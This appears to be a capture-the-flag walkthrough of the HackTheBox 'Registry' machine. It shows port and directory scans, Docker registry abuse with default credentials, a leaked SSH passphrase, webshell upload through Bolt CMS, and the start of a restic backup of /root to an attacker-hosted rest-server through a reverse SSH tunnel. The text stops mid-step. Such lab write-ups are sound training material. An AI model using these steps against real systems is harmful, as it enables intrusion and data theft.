$ nmap -p- --min-rate 5000 10.129.89.161
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-08 05:23 EST
Nmap scan report for 10.129.89.161
Host is up (0.021s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
443/tcp open https
Both the websites point towards a nginx default page.
Web Enum
I ran a gobuster scan on both of these, and found an /install directory with some random characters.
There was also a /bolt endpoint that shows a basic sample site.
Bolt CMS was a possibility of exploitation here. A feroxbuster search reveals this is the case:
Based on the Bolt CMS Repo, we can check changelog.md to see the version and find that this is Bolt 3.6.4.
This was a rather old machine, so there were RCE exploits available if I could find the credentials for the administrator. However, there were no credentials for me to exploit, and I could not do much with this. I was clearly missing something.
I went back to the /install directory and downloaded the output as a file, only to find that it was a gzip file.
$ file install_file
install_file: gzip compressed data, last modified: Mon Jul 29 23:38:20 2019, from Unix, original size modulo 2^32 167772200
There was something in here, but it kept having a unexpected EOF error when trying to decompress it. To overcome this, we can use the zcat command to extract its contents. This was the output:
Interesting, we have a private docker registry hidden on this server. I tested out the docker directory endpoint, and eventually found it as a subdomain at docker.registry.htb.
docker.registry.htb
I ran a gobuster scan on this and found this interesting endpoint:
$ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -u http://docker.registry.htb/ -t 100
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://docker.registry.htb/
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2023/03/08 05:44:16 Starting gobuster in directory enumeration mode
===============================================================
/v2 (Status: 301) [Size: 39] [--> /v2/]
When trying to access it, it requested for credentials:
Using admin:admin worked. I was forwarded to what looked like a web API. I didn't have any commands to use, so doing some basic research for Docker Registry API commands was the next step. As usual, Hacktricks had some commands.
When viewing the file contents, we will find a file at /etc/profile.d/01-ssh.sh.
#!/usr/bin/expect -f#eval `ssh-agent -s`spawnssh-add/root/.ssh/id_rsaexpect"Enter passphrase for /root/.ssh/id_rsa:"send"GkOcz221Ftb3ugog\n";expect"Identity added: /root/.ssh/id_rsa (/root/.ssh/id_rsa)"interact
I downloaded the other files to see if there were any other interesting things. Eventually, I did find a SSH private key
$curl-H'Authorization: Basic YWRtaW46YWRtaW4='http://docker.registry.htb/v2/bolt-image/blobs/sha256:2931a8b44e495489fdbe2bccd7232e99b182034206067a364553841a1f06f791-L-oblob3.tar# contents witin /root/.ssh/config: HostregistryUserboltPort22Hostnameregistry.htb# using password GkOcz221Ftb3ugog from earlier
With these, we can SSH in as bolt.
Privilege Escalation
Bolt SQLite
With access to the machine, I wanted to enumerate the bolt config files to see if I can find anything new. There was a database file bolt.db at /var/www/html/bolt/app/databases. I transferred this over using scp.
$ scp -i id_rsa bolt@registry.htb:/var/www/html/bolt/app/database/bolt.db .
Enter passphrase for key 'id_rsa':
bolt.db 100% 288KB 1.6MB/s 00:00
We have a hash here that is cracked to give strawberry.
Now, we can login to the bolt CMS and continue our enumeration.
Bolt Dashboard
We can login with admin:strawberry to the admin dashboard.
Great! Within the password hash, we saw another hint in the form of shell.php. As the administrator for bolt, we can actually create PHP files in the File Management tab. We can drop in a webshell and easily get an RCE as the next user.
Originally, this is not allowed since .php files are not included in the allowed types of files. However, as the administrator, we can change the config.yml file in Configuration > Main Configuration.
Based on docs, it seems that this was using a REST repository to host the files. Here's a Git Repository to explain what a rest server is:
Since the sudo privilege had a wildcard in it, the exploit was to create a basic rest-server and backup the entirety of the machine onto it. We can host the rest-server on our Kali machine and port forward it to this machine to make it accessible.
First, we can start rest-server on our machine and do the port forwarding:
$./rest-server--path../--no-authDatadirectory:../AuthenticationdisabledPrivaterepositoriesdisabledstartserveron:8000# in separate terminalssh-iid_rsa-R8000:127.0.0.1:8000bolt@registry.htb
Then we need to create a repository on our rest-server for restic and backup the /root directory there: